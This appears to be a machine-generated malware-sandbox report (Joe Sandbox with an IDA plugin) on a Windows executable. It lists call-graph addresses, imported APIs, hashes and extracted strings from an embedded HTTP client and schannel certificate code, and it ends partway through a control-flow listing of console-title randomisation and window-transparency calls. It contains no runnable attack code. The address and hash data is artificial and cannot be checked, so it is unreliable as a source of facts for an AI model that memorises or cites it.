49827->49828 49878 7ff7e5a01430 90 API calls 49827->49878 49828->49802 49831 7ff7e5a0b580 free 49828->49831 49830->49802 49831->49802 49832->49783 49833->49802 49834->49802 49835->49802 49836->49795 49838 7ff7e5a0ef90 49837->49838 49839 7ff7e5a0efcb 49838->49839 49840 7ff7e5a0efb6 tolower 49838->49840 49841 7ff7e5a08e80 13 API calls 49839->49841 49840->49839 49840->49840 49842 7ff7e5a0efe2 49841->49842 49843 7ff7e5a0f04c 49842->49843 49844 7ff7e5a0f028 tolower 49842->49844 49851 7ff7e5a0f0c1 49842->49851 49845 7ff7e5a0f086 _time64 49843->49845 49843->49851 49846 7ff7e5a08e80 13 API calls 49844->49846 49848 7ff7e5a0f0a5 49845->49848 49845->49851 49846->49843 49847 7ff7e5a3f580 8 API calls 49849 7ff7e5a0f0ec 49847->49849 49850 7ff7e5a05af0 15 API calls 49848->49850 49848->49851 49849->49807 49850->49851 49851->49847 49852->49818 49853->49812 49855 7ff7e5a15090 2 API calls 49854->49855 49856 7ff7e5a01eb5 49855->49856 49857 7ff7e5a01ec5 49856->49857 49858 7ff7e5a01eee free 49856->49858 49859 7ff7e5a01f19 49856->49859 49857->49827 49879 7ff7e5a08db0 15 API calls 49858->49879 49861 7ff7e5a0d7b0 2 API calls 49859->49861 49863 7ff7e5a01f25 49859->49863 49862 7ff7e5a01f4f 49861->49862 49864 7ff7e5a01f63 49862->49864 49865 7ff7e5a01f91 49862->49865 49863->49827 49866 7ff7e5a06780 665 API calls 49864->49866 49867 7ff7e5a15090 2 API calls 49865->49867 49868 7ff7e5a01f79 49866->49868 49869 7ff7e5a01f9e 49867->49869 49870 7ff7e5a01f81 49868->49870 49871 7ff7e5a0d7b0 2 API calls 49868->49871 49872 7ff7e5a01fc1 49869->49872 49873 7ff7e5a15090 2 API calls 49869->49873 49870->49827 49874 7ff7e5a02054 49871->49874 49875 7ff7e5a07300 47 API calls 49872->49875 49873->49872 49874->49827 49876 7ff7e5a01fda 49875->49876 49876->49868 49877 7ff7e5a05af0 15 API calls 49876->49877 49877->49868 49878->49828 49879->49859 49880 7ff7e5a191e0 49881 7ff7e5a32480 26 API calls 49880->49881 49882 7ff7e5a191e9 49881->49882 49883 7ff7e5a0ebe0 49884 7ff7e5a0ec2e 49883->49884 49885 7ff7e5a0ef50 18 API calls 49884->49885 49886 7ff7e5a0ec4b 49885->49886 49887 7ff7e5a05af0 15 API calls 49886->49887 49894 7ff7e5a0ec67 49886->49894 49887->49894 49888 7ff7e5a17900 13 API calls 49890 7ff7e5a0ece6 49888->49890 49889 7ff7e5a3f580 8 API calls 49891 7ff7e5a0ede2 49889->49891 49892 7ff7e5a0ecea 49890->49892 49893 7ff7e5a0ed0b 49890->49893 49917 7ff7e5a188b0 15 API calls 49892->49917 49896 7ff7e5a17900 13 API calls 49893->49896 49894->49888 49916 7ff7e5a0edb5 49894->49916 49898 7ff7e5a0ed1d 49896->49898 49897 7ff7e5a0ecff 49897->49893 49901 7ff7e5a0edfa 49897->49901 49899 7ff7e5a0ed21 49898->49899 49900 7ff7e5a0ed42 49898->49900 49918 7ff7e5a188b0 15 API calls 49899->49918 49910 7ff7e5a0ed73 49900->49910 49900->49916 49919 7ff7e5a329b0 583 API calls 49900->49919 49903 7ff7e5a0ee04 49901->49903 49922 7ff7e5a0e160 27 API calls 49903->49922 49904 7ff7e5a0ed36 49904->49900 49904->49901 49906 7ff7e5a0ee26 49907 7ff7e5a0edae 49906->49907 49923 7ff7e5a18680 free free free 49906->49923 49907->49916 49910->49901 49911 7ff7e5a0ed90 49910->49911 49912 7ff7e5a0eda9 49911->49912 49913 7ff7e5a0edb0 49911->49913 49911->49916 49920 7ff7e5a32bb0 314 API calls 49912->49920 49921 7ff7e59fae00 51 API calls 49913->49921 49916->49889 49917->49897 49918->49904 49919->49910 49920->49907 49921->49916 49922->49906 49923->49907 49924 7ff7e59f792b 49925 7ff7e59f7941 49924->49925 49926 7ff7e59f7972 49924->49926 49961 7ff7e5a0f590 49925->49961 49927 7ff7e59f7a1a 49926->49927 49932 7ff7e59f7970 49926->49932 49929 7ff7e59f7a34 49927->49929 49935 7ff7e59f7ad4 49927->49935 50208 7ff7e5a0c810 24 API calls 49929->50208 49930 7ff7e59f795a 49933 7ff7e5a15090 2 API calls 49930->49933 49934 7ff7e59f6d00 292 API calls 49932->49934 49957 7ff7e59f727b 49932->49957 49933->49932 49934->49957 49936 7ff7e59f6d00 292 API calls 49935->49936 49935->49957 49936->49957 49937 7ff7e59f7a41 49939 7ff7e59f6d00 292 API calls 49937->49939 49941 7ff7e59f7a61 49939->49941 49940 7ff7e59f8322 49943 7ff7e59f7ac6 free 49941->49943 49944 7ff7e59f7a6a 49941->49944 49942 7ff7e59f8313 50213 7ff7e5a05970 19 API calls 49942->50213 49943->49957 49947 7ff7e59f7a81 49944->49947 49948 7ff7e59f7a73 free 49944->49948 49945 7ff7e59f84a0 17 API calls 49945->49957 50209 7ff7e5a0bdd0 28 API calls 49947->50209 49948->49957 49952 7ff7e5a071f0 10 API calls 49952->49957 49953 7ff7e59f7ab7 free 49953->49957 49954 7ff7e59f7a92 49954->49953 49955 7ff7e5a05970 19 API calls 49956 7ff7e59f731e 49955->49956 49956->49955 49956->49957 49957->49940 49957->49942 49957->49945 49957->49952 49957->49956 49959 7ff7e59f6d00 292 API calls 49957->49959 50207 7ff7e5a05970 19 API calls 49957->50207 50210 7ff7e5a01430 90 API calls 49957->50210 50211 7ff7e59f5a20 15 API calls 49957->50211 50212 7ff7e5a151e0 22 API calls 49957->50212 49959->49957 49962 7ff7e5a0f628 49961->49962 49963 7ff7e5a0f661 free _strdup 49962->49963 49966 7ff7e5a0f68b 49962->49966 50158 7ff7e5a0f63e 49962->50158 49963->49966 49963->50158 49964 7ff7e5a3f580 8 API calls 49965 7ff7e59f794b 49964->49965 49965->49926 49965->49930 49967 7ff7e5a0f741 free 49966->49967 49968 7ff7e5a0f755 49966->49968 49967->49968 49969 7ff7e5a0f774 49968->49969 50224 7ff7e5a08db0 15 API calls 49968->50224 49971 7ff7e5a0f7bf free 49969->49971 49972 7ff7e5a0f81d 49969->49972 49969->50158 49974 7ff7e5a0f7d2 free 49971->49974 49981 7ff7e5a0f881 49972->49981 50225 7ff7e5a14480 386 API calls 49972->50225 49982 7ff7e5a0f923 49974->49982 49983 7ff7e5a0f94a 49974->49983 49975 7ff7e5a0f869 49978 7ff7e5a0f870 free 49975->49978 49975->49981 49978->50158 49979 7ff7e5a0f8be free 49979->49974 49979->50158 49981->49979 50226 7ff7e5a14480 386 API calls 49981->50226 49982->49983 50227 7ff7e5a08db0 15 API calls 49982->50227 49985 7ff7e5a0fa06 free 49983->49985 49986 7ff7e5a0f9ce free 49983->49986 49983->50158 49987 7ff7e5a0f9f5 49985->49987 50228 7ff7e5a08db0 15 API calls 49986->50228 49989 7ff7e5a0fa3d 49987->49989 49995 7ff7e5a0fa26 49987->49995 49987->50158 50229 7ff7e59fbc00 6 API calls 49989->50229 49991 7ff7e5a0fa49 50230 7ff7e5a33f20 59 API calls 49991->50230 49993 7ff7e5a0fa62 49993->49995 49993->50158 49994 7ff7e5a0fcac free 50007 7ff7e5a0fccf 49994->50007 50024 7ff7e5a0fa2b 49995->50024 50231 7ff7e59fcb70 free free 49995->50231 49997 7ff7e5a0fb38 49999 7ff7e5a0fb7f strchr 49997->49999 50016 7ff7e5a0fb51 49997->50016 49998 7ff7e5a0fad0 50232 7ff7e59fbe00 26 API calls 49998->50232 50001 7ff7e5a0fb94 strchr 49999->50001 49999->50016 50006 7ff7e5a0fba7 strchr 50001->50006 50001->50016 50002 7ff7e5a0fdd7 50011 7ff7e5a0fe00 50002->50011 50012 7ff7e5a0fe3b 50002->50012 50003 7ff7e5a0fc8c 50234 7ff7e5a05970 19 API calls 50003->50234 50004 7ff7e5a0fae5 50233 7ff7e59fcb70 free free 50004->50233 50006->50016 50007->50002 50008 7ff7e5a0fd05 50007->50008 50235 7ff7e5a12090 strchr strchr strchr malloc memcpy 50008->50235 50009 7ff7e5a0fc05 50009->50003 50009->50016 50237 7ff7e5a08db0 15 API calls 50011->50237 50238 7ff7e5a08db0 15 API calls 50012->50238 50016->49994 50017 7ff7e5a0fd0d 50018 7ff7e5a0fd2b 50017->50018 50019 7ff7e5a0fd20 free 50017->50019 50017->50158 50021 7ff7e5a0fd56 50018->50021 50026 7ff7e5a0fd40 memcpy 50018->50026 50020 7ff7e5a0fd7f 50019->50020 50029 7ff7e5a0fda3 50020->50029 50236 7ff7e5a08db0 15 API calls 50020->50236 50023 7ff7e5a0fd5b strchr 50021->50023 50022 7ff7e5a0fe39 50025 7ff7e5a1005f 50022->50025 50022->50029 50022->50158 50027 7ff7e5a0fd68 50023->50027 50028 7ff7e5a0fd6b free 50023->50028 50024->49997 50024->50009 50024->50158 50034 7ff7e5a1009e 50025->50034 50036 7ff7e5a10158 50025->50036 50048 7ff7e5a10171 50025->50048 50063 7ff7e5a101cf 50025->50063 50026->50023 50027->50028 50028->50020 50029->50022 50041 7ff7e5a0fc9b 50029->50041 50239 7ff7e5a2e540 23 API calls 50029->50239 50032 7ff7e5a102f0 calloc 50035 7ff7e5a1031f 50032->50035 50032->50158 50033 7ff7e5a10052 50037 7ff7e5a2e510 13 API calls 50033->50037 50040 7ff7e5a100da free 50034->50040 50042 7ff7e5a1022e 50034->50042 50043 7ff7e5a100fa 50034->50043 50038 7ff7e5a11960 25 API calls 50035->50038 50242 7ff7e5a05970 19 API calls 50036->50242 50037->50041 50044 7ff7e5a10333 50038->50044 50241 7ff7e5a08db0 15 API calls 50040->50241 50041->50158 50042->50043 50047 7ff7e5a10252 free 50042->50047 50043->50032 50043->50158 50052 7ff7e5a103a0 50044->50052 50058 7ff7e5a10367 50044->50058 50044->50158 50050 7ff7e5a1027d 50047->50050 50051 7ff7e5a10270 50047->50051 50055 7ff7e5a10212 50048->50055 50048->50063 50049 7ff7e5a0ff62 50049->50033 50056 7ff7e5a0ff6a 50049->50056 50050->50051 50057 7ff7e5a10290 50050->50057 50246 7ff7e5a08db0 15 API calls 50051->50246 50053 7ff7e5a103ce 50052->50053 50054 7ff7e5a103a5 50052->50054 50248 7ff7e5a115a0 7 API calls 50053->50248 50060 7ff7e5a11960 25 API calls 50054->50060 50244 7ff7e5a05970 19 API calls 50055->50244 50061 7ff7e5a2e510 13 API calls 50056->50061 50245 7ff7e5a08db0 15 API calls 50057->50245 50247 7ff7e5a115a0 7 API calls 50058->50247 50059 7ff7e5a0feb7 50059->50033 50059->50158 50240 7ff7e5a2e680 8 API calls 50059->50240 50080 7ff7e5a103cc 50060->50080 50074 7ff7e5a0ff72 50061->50074 50063->50034 50069 7ff7e5a101f9 50063->50069 50243 7ff7e5a05970 19 API calls 50069->50243 50071 7ff7e5a103eb 50077 7ff7e5a11960 25 API calls 50071->50077 50071->50080 50071->50158 50073 7ff7e5a10388 free 50073->50080 50074->50025 50075 7ff7e5a0ff9a strstr 50074->50075 50076 7ff7e5a1002f 50074->50076 50078 7ff7e5a0ffb2 50075->50078 50076->50025 50077->50080 50078->50076 50079 7ff7e5a08e80 13 API calls 50078->50079 50079->50076 50081 7ff7e5a11960 25 API calls 50080->50081 50080->50158 50082 7ff7e5a105e0 free free free 50081->50082 50084 7ff7e5a1061e 50082->50084 50082->50158 50083 7ff7e5a107db 50086 7ff7e5a10921 50083->50086 50083->50158 50252 7ff7e5a17c70 _gmtime64 50083->50252 50084->50083 50085 7ff7e5a10681 50084->50085 50092 7ff7e5a10765 50084->50092 50084->50158 50249 7ff7e59f9a20 62 API calls 50085->50249 50214 7ff7e5a11a00 50086->50214 50087 7ff7e5a107b0 50087->50083 50093 7ff7e5a107c4 50087->50093 50087->50158 50090 7ff7e5a1080d 50094 7ff7e5a10813 50090->50094 50111 7ff7e5a10829 50090->50111 50091 7ff7e5a10784 50096 7ff7e5a11960 25 API calls 50091->50096 50091->50158 50092->50087 50092->50091 50095 7ff7e5a11960 25 API calls 50092->50095 50251 7ff7e5a115a0 7 API calls 50093->50251 50253 7ff7e5a05970 19 API calls 50094->50253 50095->50091 50096->50087 50100 7ff7e5a107d8 50100->50083 50101 7ff7e5a1092f 50102 7ff7e5a10960 50101->50102 50109 7ff7e5a10d4c 50101->50109 50101->50158 50103 7ff7e5a10cf3 50102->50103 50106 7ff7e5a10a57 50102->50106 50107 7ff7e5a10970 50102->50107 50263 7ff7e5a115a0 7 API calls 50103->50263 50104 7ff7e5a10756 50104->50092 50110 7ff7e5a10a60 50106->50110 50129 7ff7e5a10ad1 50106->50129 50107->50103 50127 7ff7e5a1097a 50107->50127 50108 7ff7e5a10d09 50121 7ff7e5a11710 62 API calls 50108->50121 50108->50158 50114 7ff7e5a11960 25 API calls 50109->50114 50118 7ff7e5a10da5 50109->50118 50113 7ff7e5a11960 25 API calls 50110->50113 50111->50086 50115 7ff7e5a08e80 13 API calls 50111->50115 50111->50158 50112 7ff7e5a1074e 50250 7ff7e59f9990 9 API calls 50112->50250 50119 7ff7e5a10a70 50113->50119 50114->50118 50124 7ff7e5a108f5 50115->50124 50116 7ff7e5a10b64 50141 7ff7e5a10c41 50116->50141 50157 7ff7e5a10b7f 50116->50157 50117 7ff7e5a10dd1 50142 7ff7e5a10ec1 50117->50142 50117->50158 50171 7ff7e5a10df4 50117->50171 50118->50117 50125 7ff7e5a11960 25 API calls 50118->50125 50118->50158 50134 7ff7e5a11710 62 API calls 50119->50134 50119->50158 50120 7ff7e5a11960 25 API calls 50128 7ff7e5a106c8 50120->50128 50126 7ff7e5a10d2c 50121->50126 50122 7ff7e5a109cb 50130 7ff7e5a109ef 50122->50130 50122->50158 50255 7ff7e5a13f90 28 API calls 50122->50255 50254 7ff7e5a115a0 7 API calls 50124->50254 50125->50117 50135 7ff7e5a10aaf 50126->50135 50136 7ff7e5a10d36 50126->50136 50127->50122 50146 7ff7e5a11960 25 API calls 50127->50146 50128->50104 50128->50112 50128->50120 50131 7ff7e5a11960 25 API calls 50129->50131 50140 7ff7e5a10b20 50129->50140 50256 7ff7e5a115a0 7 API calls 50130->50256 50131->50140 50133 7ff7e5a11960 25 API calls 50133->50140 50143 7ff7e5a10a93 50134->50143 50259 7ff7e5a0c9a0 17 API calls 50135->50259 50264 7ff7e5a05970 19 API calls 50136->50264 50138 7ff7e5a109e7 50138->50130 50138->50158 50140->50116 50140->50133 50140->50158 50173 7ff7e5a10c25 50141->50173 50260 7ff7e5a13f90 28 API calls 50141->50260 50186 7ff7e5a10e6c 50142->50186 50265 7ff7e5a13f90 28 API calls 50142->50265 50143->50135 50148 7ff7e5a10a99 50143->50148 50146->50122 50258 7ff7e5a05970 19 API calls 50148->50258 50151 7ff7e5a10917 50151->50086 50151->50158 50154 7ff7e5a10a05 50154->50158 50160 7ff7e5a11710 62 API calls 50154->50160 50155 7ff7e5a10ef7 50165 7ff7e5a10f11 50155->50165 50176 7ff7e5a10fe8 50155->50176 50156 7ff7e5a11081 50273 7ff7e5a115a0 7 API calls 50156->50273 50161 7ff7e5a10bbf strchr 50157->50161 50157->50173 50158->49964 50159 7ff7e5a10ac8 50159->50158 50275 7ff7e5a151e0 22 API calls 50159->50275 50164 7ff7e5a10a33 50160->50164 50166 7ff7e5a10bd4 strchr 50161->50166 50185 7ff7e5a10bf4 50161->50185 50162 7ff7e5a10e37 strchr 50167 7ff7e5a10e4c strchr 50162->50167 50162->50186 50168 7ff7e5a10a39 50164->50168 50169 7ff7e5a10a4f 50164->50169 50170 7ff7e5a10f1e 50165->50170 50165->50176 50172 7ff7e5a10be7 strchr 50166->50172 50166->50185 50174 7ff7e5a10e5f strchr 50167->50174 50167->50186 50257 7ff7e5a05970 19 API calls 50168->50257 50274 7ff7e5a0c9a0 17 API calls 50169->50274 50266 7ff7e5a115a0 7 API calls 50170->50266 50171->50162 50171->50186 50172->50185 50261 7ff7e5a115a0 7 API calls 50173->50261 50174->50186 50176->50158 50194 7ff7e5a10f58 50176->50194 50271 7ff7e5a115a0 7 API calls 50176->50271 50177 7ff7e5a10c80 50177->50158 50182 7ff7e5a11710 62 API calls 50177->50182 50180 7ff7e5a11155 50180->50158 50189 7ff7e5a05af0 15 API calls 50180->50189 50188 7ff7e5a10cd3 50182->50188 50183 7ff7e5a10f34 50183->50158 50192 7ff7e5a10f5d 50183->50192 50193 7ff7e5a10f45 50183->50193 50184 7ff7e5a11043 50190 7ff7e5a11710 62 API calls 50184->50190 50185->50158 50185->50173 50186->50155 50186->50156 50186->50158 50188->50169 50191 7ff7e5a10cdd 50188->50191 50189->50158 50195 7ff7e5a11061 50190->50195 50262 7ff7e5a05970 19 API calls 50191->50262 50198 7ff7e5a10fa4 50192->50198 50200 7ff7e5a11960 25 API calls 50192->50200 50267 7ff7e5a115a0 7 API calls 50193->50267 50194->50158 50194->50184 50195->50169 50199 7ff7e5a1106b 50195->50199 50198->50194 50270 7ff7e5a115a0 7 API calls 50198->50270 50272 7ff7e5a05970 19 API calls 50199->50272 50203 7ff7e5a10f75 50200->50203 50203->50194 50268 7ff7e5a115a0 7 API calls 50203->50268 50205 7ff7e5a10f8c 50205->50198 50269 7ff7e5a115a0 7 API calls 50205->50269 50207->49957 50208->49937 50209->49954 50210->49957 50211->49957 50212->49957 50213->49940 50220 7ff7e5a11a2b 50214->50220 50215 7ff7e5a11ab0 strchr 50217 7ff7e5a11ac9 strchr 50215->50217 50215->50220 50216 7ff7e5a11d0a 50216->50101 50217->50220 50218 7ff7e5a11b18 _strdup 50219 7ff7e5a11d29 50218->50219 50218->50220 50219->50216 50221 7ff7e5a11d33 free free 50219->50221 50220->50215 50220->50216 50220->50218 50222 7ff7e5a11ce4 free 50220->50222 50223 7ff7e5a11960 25 API calls 50220->50223 50221->50216 50222->50220 50223->50220 50224->49969 50225->49975 50226->49979 50227->49983 50228->49987 50229->49991 50230->49993 50231->49998 50232->50004 50233->50024 50234->50041 50235->50017 50236->50029 50237->50022 50238->50022 50239->50059 50240->50049 50241->50043 50242->50041 50243->50041 50244->50041 50245->50043 50246->50043 50247->50073 50248->50071 50249->50128 50250->50104 50251->50100 50252->50090 50253->50041 50254->50151 50255->50138 50256->50154 50257->50158 50258->50041 50259->50159 50260->50185 50261->50177 50262->50041 50263->50108 50264->50041 50265->50186 50266->50183 50267->50194 50268->50205 50269->50198 50270->50194 50271->50194 50272->50041 50273->50176 50274->50159 50275->50180 50276 7ff7e5a1a005 50278 7ff7e5a1a009 50276->50278 50277 7ff7e5a1a0d7 50279 7ff7e5a1a0f6 strchr 50277->50279 50280 7ff7e5a1a595 calloc 50277->50280 50278->50277 50299 7ff7e5a1a090 strtol 50278->50299 50304 7ff7e5a1a0b2 strchr 50278->50304 50312 7ff7e5a19430 304 API calls 50278->50312 50329 7ff7e5a1a137 50278->50329 50281 7ff7e5a1a25b 50279->50281 50282 7ff7e5a1a10f strncmp 50279->50282 50283 7ff7e5a1a638 50280->50283 50284 7ff7e5a1a5bc 50280->50284 50289 7ff7e5a1a61b 50281->50289 50290 7ff7e5a1a36e fopen 50281->50290 50285 7ff7e5a1a150 strncmp 50282->50285 50316 7ff7e5a1a12c 50282->50316 50294 7ff7e5a1a69a 50283->50294 50295 7ff7e5a1a694 CertFreeCertificateContext 50283->50295 50387 7ff7e5a05970 19 API calls 50284->50387 50288 7ff7e5a1a172 strncmp 50285->50288 50285->50316 50287 7ff7e5a1a229 strchr 50287->50281 50293 7ff7e5a1a243 _strdup 50287->50293 50296 7ff7e5a1a194 strncmp 50288->50296 50288->50316 50389 7ff7e5a05970 19 API calls 50289->50389 50290->50289 50297 7ff7e5a1a387 fseek 50290->50297 50291 7ff7e5a1a5cb 50298 7ff7e5a1a5d9 CertFreeCertificateContext 50291->50298 50347 7ff7e5a1a856 50291->50347 50293->50281 50311 7ff7e5a1a263 50293->50311 50300 7ff7e5a1a69e 50294->50300 50310 7ff7e5a1a703 50294->50310 50295->50294 50301 7ff7e5a1a1b3 strncmp 50296->50301 50296->50316 50302 7ff7e5a1a3bd 50297->50302 50303 7ff7e5a1a3b1 ftell 50297->50303 50298->50347 50299->50278 50299->50304 50390 7ff7e59f1d10 22 API calls 50300->50390 50301->50287 50307 7ff7e5a1a1ca strncmp 50301->50307 50308 7ff7e5a1a5e9 fclose 50302->50308 50309 7ff7e5a1a3ce fseek 50302->50309 50303->50302 50304->50277 50304->50278 50306 7ff7e5a3f580 8 API calls 50314 7ff7e5a1aa0c 50306->50314 50315 7ff7e5a1a1e9 strncmp 50307->50315 50307->50316 50388 7ff7e5a05970 19 API calls 50308->50388 50309->50308 50317 7ff7e5a1a3eb malloc 50309->50317 50319 7ff7e5a17900 13 API calls 50310->50319 50311->50281 50321 7ff7e5a1a284 CertOpenStore 50311->50321 50312->50278 50313 7ff7e5a1a6b2 50391 7ff7e5a05970 19 API calls 50313->50391 50315->50316 50324 7ff7e5a1a208 strncmp 50315->50324 50316->50287 50317->50308 50323 7ff7e5a1a404 fread 50317->50323 50320 7ff7e5a1a71c 50319->50320 50326 7ff7e5a1a72f 50320->50326 50333 7ff7e5a17900 13 API calls 50320->50333 50327 7ff7e5a1a2d7 free CryptStringToBinaryA 50321->50327 50328 7ff7e5a1a2a7 GetLastError 50321->50328 50323->50308 50331 7ff7e5a1a422 fclose 50323->50331 50324->50281 50324->50316 50325 7ff7e5a1a608 free 50325->50347 50334 7ff7e5a05af0 15 API calls 50326->50334 50343 7ff7e5a1a742 50326->50343 50336 7ff7e5a1a322 CertFindCertificateInStore 50327->50336 50337 7ff7e5a1a561 CertCloseStore 50327->50337 50383 7ff7e5a05970 19 API calls 50328->50383 50382 7ff7e5a05970 19 API calls 50329->50382 50330 7ff7e5a1a6c4 free 50338 7ff7e5a1a146 50330->50338 50330->50347 50339 7ff7e5a1a44f malloc 50331->50339 50340 7ff7e5a1a43f 50331->50340 50333->50326 50334->50343 50345 7ff7e5a1a57a CertCloseStore 50336->50345 50346 7ff7e5a1a354 50336->50346 50337->50347 50338->50347 50341 7ff7e5a1a469 MultiByteToWideChar 50339->50341 50342 7ff7e5a1a493 PFXImportCertStore free free 50339->50342 50340->50339 50341->50342 50351 7ff7e5a1a51a CertFindCertificateInStore 50342->50351 50352 7ff7e5a1a4c4 GetLastError 50342->50352 50349 7ff7e5a05af0 15 API calls 50343->50349 50353 7ff7e5a1a78b 50343->50353 50344 7ff7e5a1a2c6 free 50344->50347 50345->50280 50346->50337 50347->50306 50349->50353 50350 7ff7e5a1a7ed calloc 50354 7ff7e5a1a847 50350->50354 50355 7ff7e5a1a860 50350->50355 50356 7ff7e5a1a542 GetLastError 50351->50356 50357 7ff7e5a1a576 50351->50357 50358 7ff7e5a1a4d9 50352->50358 50359 7ff7e5a1a501 50352->50359 50353->50350 50392 7ff7e5a05970 19 API calls 50354->50392 50355->50347 50364 7ff7e5a1a8c9 free 50355->50364 50365 7ff7e5a1a96c 50355->50365 50386 7ff7e5a05970 19 API calls 50356->50386 50357->50345 50384 7ff7e5a05970 19 API calls 50358->50384 50385 7ff7e5a05970 19 API calls 50359->50385 50366 7ff7e5a1a8fa 50364->50366 50367 7ff7e5a1a946 50364->50367 50368 7ff7e5a06230 48 API calls 50365->50368 50370 7ff7e5a1a920 50366->50370 50371 7ff7e5a1a902 50366->50371 50397 7ff7e59f1d10 22 API calls 50367->50397 50372 7ff7e5a1a98d 50368->50372 50395 7ff7e59f1d10 22 API calls 50370->50395 50393 7ff7e59f1d10 22 API calls 50371->50393 50372->50347 50399 7ff7e5a05970 19 API calls 50372->50399 50373 7ff7e5a1a950 50398 7ff7e5a05970 19 API calls 50373->50398 50377 7ff7e5a1a909 50394 7ff7e5a05970 19 API calls 50377->50394 50378 7ff7e5a1a92a 50396 7ff7e5a05970 19 API calls 50378->50396 50382->50338 50383->50344 50384->50338 50385->50338 50386->50337 50387->50291 50388->50325 50389->50338 50390->50313 50391->50330 50392->50347 50393->50377 50394->50338 50395->50378 50396->50338 50397->50373 50398->50338 50399->50347
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$strchr$_strdup$callocmemcpystrstr
                                            • String ID: %s$%s $%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s%s$%s%s=%s$%s: %s, %02d %s %4d %02d:%02d:%02d GMT$%s?%s$%x$0$1.0$1.1$100-continue$;type=$;type=%c$?%s$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Chunky upload is not supported by HTTP 1.0$Content-Length$Content-Length: %I64d$Content-Length: 0$Content-Range$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Content-Type$Content-Type: application/x-www-form-urlencoded$Cookie$Cookie: $Could not seek stream$Could only read %I64d bytes from the input$Expect$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request$File already completely uploaded$GET$HEAD$Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified$OPTIONS$POST$PUT$Proxy-Connection$Proxy-Connection: Keep-Alive$Range$Range: bytes=%s$Referer$Referer: %s$Transfer-Encoding$Transfer-Encoding:$Transfer-Encoding: chunked$User-Agent$chunked$ftp$ftp://%s:%s@%s$http$multipart/form-data$upload completely sent off: %I64d out of %I64d bytes
                                            • API String ID: 2045874074-4264080130
                                            • Opcode ID: 47623950a0bbe64e698ed1ebe928e22b03c269fb12d880581cf83119aadb09f5
                                            • Instruction ID: e204057595be48d693c45dcfeb770108bcfa2bb89a2df2719a671df6c025598e
                                            • Opcode Fuzzy Hash: 47623950a0bbe64e698ed1ebe928e22b03c269fb12d880581cf83119aadb09f5
                                            • Instruction Fuzzy Hash: 0103C261F0868A86FB54AB319560BB9AFA0BF45F88F844037CE4D97695DF3CE445C322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strchr$_strdupstrncmpstrtol
                                            • String ID: CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$Services$Unable to set ciphers to passed via SSL_CONN_CONFIG$Users$http/1.1$http/1.1$schannel: ALPN, offering %s$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate from file %s, last error is 0x%x$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%x$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %x %s, last error is 0x%x$schannel: Failed to read cert file %s$schannel: TLS 1.3 is not yet supported$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.
                                            • API String ID: 707411602-3372543188
                                            • Opcode ID: d89aac1099c6e6052993711684499b2b5f7c8b83f93c3e0272dea94e26d5bd3d
                                            • Instruction ID: a4d013adc49d0ea37f32b23495834c54dd422168298bf255ac1ab3e0b20c6d97
                                            • Opcode Fuzzy Hash: d89aac1099c6e6052993711684499b2b5f7c8b83f93c3e0272dea94e26d5bd3d
                                            • Instruction Fuzzy Hash: 6442C361B0874A85EB24AF65E960BB9AB90FF44F94F804137CA1E87790DF3CE544C762

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 870 7ff7e59f1530-7ff7e59f157c rand 871 7ff7e59f1583-7ff7e59f158a 870->871 871->871 872 7ff7e59f158c-7ff7e59f15be call 7ff7e59f0580 rand 871->872 875 7ff7e59f1633-7ff7e59f164f SetConsoleTitleA 872->875 876 7ff7e59f15c0 872->876 878 7ff7e59f1685-7ff7e59f1700 GetConsoleWindow GetWindowLongPtrA SetWindowLongPtrA SetLayeredWindowAttributes GetStdHandle SetConsoleTextAttribute GetStdHandle SetConsoleTextAttribute call 7ff7e59e2aa0 875->878 879 7ff7e59f1651-7ff7e59f1662 875->879 877 7ff7e59f15c2-7ff7e59f15f7 rand 876->877 883 7ff7e59f1619-7ff7e59f1624 call 7ff7e59f0680 877->883 884 7ff7e59f15f9-7ff7e59f1617 877->884 887 7ff7e59f1705-7ff7e59f1907 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 * 2 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 GetStdHandle SetConsoleTextAttribute call 